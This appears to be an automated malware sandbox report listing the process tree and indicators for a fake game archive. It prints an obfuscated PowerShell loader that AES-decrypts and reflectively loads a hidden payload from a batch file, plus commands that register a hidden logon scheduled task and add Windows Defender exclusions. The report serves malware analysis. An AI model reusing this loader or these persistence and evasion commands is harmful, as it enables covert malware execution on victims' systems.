Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1764 firefox.exe Token: SeDebugPrivilege 1764 firefox.exe Token: 33 1684 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1684 AUDIODG.EXE Token: SeDebugPrivilege 1764 firefox.exe Token: SeDebugPrivilege 1764 firefox.exe Token: SeDebugPrivilege 1764 firefox.exe Token: SeDebugPrivilege 3908 tasklist.exe Token: SeManageVolumePrivilege 2748 svchost.exe Token: SeDebugPrivilege 3716 download_client_files.bat.exe Token: SeDebugPrivilege 5520 powershell.exe Token: SeIncreaseQuotaPrivilege 5520 powershell.exe Token: SeSecurityPrivilege 5520 powershell.exe Token: SeTakeOwnershipPrivilege 5520 powershell.exe Token: SeLoadDriverPrivilege 5520 powershell.exe Token: SeSystemProfilePrivilege 5520 powershell.exe Token: SeSystemtimePrivilege 5520 powershell.exe Token: SeProfSingleProcessPrivilege 5520 powershell.exe Token: SeIncBasePriorityPrivilege 5520 powershell.exe Token: SeCreatePagefilePrivilege 5520 powershell.exe Token: SeBackupPrivilege 5520 powershell.exe Token: SeRestorePrivilege 5520 powershell.exe Token: SeShutdownPrivilege 5520 powershell.exe Token: SeDebugPrivilege 5520 powershell.exe Token: SeSystemEnvironmentPrivilege 5520 powershell.exe Token: SeRemoteShutdownPrivilege 5520 powershell.exe Token: SeUndockPrivilege 5520 powershell.exe Token: SeManageVolumePrivilege 5520 powershell.exe Token: 33 5520 powershell.exe Token: 34 5520 powershell.exe Token: 35 5520 powershell.exe Token: 36 5520 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe Token: SeIncreaseQuotaPrivilege 3884 powershell.exe Token: SeSecurityPrivilege 3884 powershell.exe Token: SeTakeOwnershipPrivilege 3884 powershell.exe Token: SeLoadDriverPrivilege 3884 powershell.exe Token: SeSystemProfilePrivilege 3884 powershell.exe Token: SeSystemtimePrivilege 3884 powershell.exe Token: SeProfSingleProcessPrivilege 3884 powershell.exe Token: SeIncBasePriorityPrivilege 3884 powershell.exe Token: SeCreatePagefilePrivilege 3884 powershell.exe Token: SeBackupPrivilege 3884 powershell.exe Token: SeRestorePrivilege 3884 powershell.exe Token: SeShutdownPrivilege 3884 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe Token: SeSystemEnvironmentPrivilege 3884 powershell.exe Token: SeRemoteShutdownPrivilege 3884 powershell.exe Token: SeUndockPrivilege 3884 powershell.exe Token: SeManageVolumePrivilege 3884 powershell.exe Token: 33 3884 powershell.exe Token: 34 3884 powershell.exe Token: 35 3884 powershell.exe Token: 36 3884 powershell.exe Token: SeIncreaseQuotaPrivilege 3884 powershell.exe Token: SeSecurityPrivilege 3884 powershell.exe Token: SeTakeOwnershipPrivilege 3884 powershell.exe Token: SeLoadDriverPrivilege 3884 powershell.exe Token: SeSystemProfilePrivilege 3884 powershell.exe Token: SeSystemtimePrivilege 3884 powershell.exe Token: SeProfSingleProcessPrivilege 3884 powershell.exe Token: SeIncBasePriorityPrivilege 3884 powershell.exe Token: SeCreatePagefilePrivilege 3884 powershell.exe Token: SeBackupPrivilege 3884 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 1764 firefox.exe 760 startup_str_933.bat.exe 5152 firefox.exe 5152 firefox.exe 5152 firefox.exe 5152 firefox.exe 5152 firefox.exe 5152 firefox.exe 5152 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 5024 wrote to memory of 1764 5024 firefox.exe 99 PID 1764 wrote to memory of 1128 1764 firefox.exe 100 PID 1764 wrote to memory of 1128 1764 firefox.exe 100 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 404 1764 firefox.exe 101 PID 1764 wrote to memory of 4392 1764 firefox.exe 102 PID 1764 wrote to memory of 4392 1764 firefox.exe 102 PID 1764 wrote to memory of 4392 1764 firefox.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\VoidFiles4.zip1⤵PID:4528
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.0.2097646323\963119718" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1800 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e0b38c6-c39a-4c38-b2c9-099c97920501} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 1964 208141d6158 gpu3⤵PID:1128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.1.245356033\1525855593" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3673b026-c73e-415e-aac9-d5d373117809} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 2364 20813d32c58 socket3⤵
- Checks processor information in registry
PID:404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.2.570572880\1843850128" -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 3236 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33c8000d-ab91-485d-a51e-bb2edb5d435c} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 3248 208183c1858 tab3⤵PID:4392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.3.50231708\1111889708" -childID 2 -isForBrowser -prefsHandle 3572 -prefMapHandle 3568 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {702ae0c4-ea76-4184-9ee3-c86bf7557422} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 3580 2080796e558 tab3⤵PID:3232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.4.116737329\2102665730" -childID 3 -isForBrowser -prefsHandle 4672 -prefMapHandle 4668 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf0efcbc-9b42-4c5b-9f10-01fca697eeb7} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 4684 20819eb1058 tab3⤵PID:3608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.5.837709389\488280373" -childID 4 -isForBrowser -prefsHandle 5136 -prefMapHandle 5132 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b6a71f8-8e75-45ed-b42a-0f9c35c23fb2} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5076 2081a4db858 tab3⤵PID:1472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.6.1361158131\590616590" -childID 5 -isForBrowser -prefsHandle 5272 -prefMapHandle 5276 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d814636-e0fc-4a0b-82fd-12f5e83da892} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5264 2081a9b1e58 tab3⤵PID:2904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.7.1001466148\2124134316" -childID 6 -isForBrowser -prefsHandle 5608 -prefMapHandle 5604 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90ce712c-4ab4-4c58-a253-cdbd5246ac00} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5620 2081a9af758 tab3⤵PID:5332
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.8.825370695\1113394853" -parentBuildID 20221007134813 -prefsHandle 5872 -prefMapHandle 5860 -prefsLen 26285 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac4bb08e-5403-47f7-b649-7a877aa95197} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5864 2081bc79558 rdd3⤵PID:5756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.9.413150795\1559953259" -childID 7 -isForBrowser -prefsHandle 6024 -prefMapHandle 6020 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3286b654-f1c1-4f2d-9425-7858c6eeb5fd} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 6036 20807961958 tab3⤵PID:5828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.10.227311377\1419148502" -childID 8 -isForBrowser -prefsHandle 4880 -prefMapHandle 3112 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46ba9a2e-212f-4c35-8814-8aab2b5ba64c} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 4932 20807965c58 tab3⤵PID:2148
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.11.197864077\1178236711" -childID 9 -isForBrowser -prefsHandle 6192 -prefMapHandle 4872 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a546d5-b1bd-4d31-a2d7-d32725bff76a} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 6244 2081bc79e58 tab3⤵PID:5512
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.12.711431808\156777607" -childID 10 -isForBrowser -prefsHandle 5488 -prefMapHandle 4852 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35479d78-0dd9-4498-bef1-873029a110a8} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5328 2081a4a7258 tab3⤵PID:4844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.13.2080920677\1772473893" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5864 -prefMapHandle 4852 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9fc0c348-ad37-462e-943e-89b1f6bbcca4} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 5124 2081c54b858 utility3⤵PID:1620
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.14.894477611\2125151401" -childID 11 -isForBrowser -prefsHandle 5332 -prefMapHandle 5340 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e350951a-46b4-4d53-be43-91fe502d01d2} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 4720 2081a9b1e58 tab3⤵PID:5688
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.15.2010336824\633000949" -childID 12 -isForBrowser -prefsHandle 6596 -prefMapHandle 6600 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f250dd0-22ce-4677-9028-2e6933631998} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 6588 2081c4fbc58 tab3⤵PID:3740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1764.16.254933321\1487285437" -childID 13 -isForBrowser -prefsHandle 6720 -prefMapHandle 6588 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f07fde8-a7e5-4350-a067-2e50c036865c} 1764 "\\.\pipe\gecko-crash-server-pipe.1764" 6728 2081ddee358 tab3⤵PID:6068
-
-
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵PID:3996
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x304 0x4c81⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2364
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\VoidFiles4\how_to_start_the_game.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4016
-
C:\VoidFiles4\game_start.exe"C:\VoidFiles4\game_start.exe"1⤵PID:5208
-
C:\VoidFiles4\game_start.exe"C:\VoidFiles4\game_start.exe"2⤵
- Drops startup file
- Loads dropped DLL
PID:3272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:5800
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\VoidFiles4\download_client_files.bat1⤵
- Opens file in notepad (likely ransom note)
PID:4020
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:4544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\VoidFiles4\download_client_files.bat" "1⤵PID:3052
-
C:\VoidFiles4\download_client_files.bat.exe"download_client_files.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_Jwcwl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\VoidFiles4\download_client_files.bat').Split([Environment]::NewLine);foreach ($_CASH_rgThJ in $_CASH_Jwcwl) { if ($_CASH_rgThJ.StartsWith(':: @')) { $_CASH_pnkRh = $_CASH_rgThJ.Substring(4); break; }; };$_CASH_pnkRh = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pnkRh, '_CASH_', '');$_CASH_gYDHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pnkRh);$_CASH_wruKf = New-Object System.Security.Cryptography.AesManaged;$_CASH_wruKf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_wruKf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_wruKf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R19/NiNVRoFO2vZOiujvRGKzHWCd68DwwUISuJ8MeOQ=');$_CASH_wruKf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b/+OAjFHpyzkZcCY5eN+nA==');$_CASH_faAGX = $_CASH_wruKf.CreateDecryptor();$_CASH_gYDHz = $_CASH_faAGX.TransformFinalBlock($_CASH_gYDHz, 0, $_CASH_gYDHz.Length);$_CASH_faAGX.Dispose();$_CASH_wruKf.Dispose();$_CASH_RFnfs = New-Object System.IO.MemoryStream(, $_CASH_gYDHz);$_CASH_HpVGO = New-Object System.IO.MemoryStream;$_CASH_lwIrO = New-Object System.IO.Compression.GZipStream($_CASH_RFnfs, [IO.Compression.CompressionMode]::Decompress);$_CASH_lwIrO.CopyTo($_CASH_HpVGO);$_CASH_lwIrO.Dispose();$_CASH_RFnfs.Dispose();$_CASH_HpVGO.Dispose();$_CASH_gYDHz = $_CASH_HpVGO.ToArray();$_CASH_OXEQM = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gYDHz);$_CASH_JNuhI = $_CASH_OXEQM.EntryPoint;$_CASH_JNuhI.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\VoidFiles4\download_client_files')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_933_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_933.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_933.vbs"3⤵
- Checks computer location settings
PID:2692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_933.bat" "4⤵PID:6024
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exe"startup_str_933.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_Jwcwl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_933.bat').Split([Environment]::NewLine);foreach ($_CASH_rgThJ in $_CASH_Jwcwl) { if ($_CASH_rgThJ.StartsWith(':: @')) { $_CASH_pnkRh = $_CASH_rgThJ.Substring(4); break; }; };$_CASH_pnkRh = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pnkRh, '_CASH_', '');$_CASH_gYDHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pnkRh);$_CASH_wruKf = New-Object System.Security.Cryptography.AesManaged;$_CASH_wruKf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_wruKf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_wruKf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R19/NiNVRoFO2vZOiujvRGKzHWCd68DwwUISuJ8MeOQ=');$_CASH_wruKf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b/+OAjFHpyzkZcCY5eN+nA==');$_CASH_faAGX = $_CASH_wruKf.CreateDecryptor();$_CASH_gYDHz = $_CASH_faAGX.TransformFinalBlock($_CASH_gYDHz, 0, $_CASH_gYDHz.Length);$_CASH_faAGX.Dispose();$_CASH_wruKf.Dispose();$_CASH_RFnfs = New-Object System.IO.MemoryStream(, $_CASH_gYDHz);$_CASH_HpVGO = New-Object System.IO.MemoryStream;$_CASH_lwIrO = New-Object System.IO.Compression.GZipStream($_CASH_RFnfs, [IO.Compression.CompressionMode]::Decompress);$_CASH_lwIrO.CopyTo($_CASH_HpVGO);$_CASH_lwIrO.Dispose();$_CASH_RFnfs.Dispose();$_CASH_HpVGO.Dispose();$_CASH_gYDHz = $_CASH_HpVGO.ToArray();$_CASH_OXEQM = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gYDHz);$_CASH_JNuhI = $_CASH_OXEQM.EntryPoint;$_CASH_JNuhI.Invoke($null, (, [string[]] ('')))5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_933')6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_933.bat'6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_933.bat'6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4360
-
-
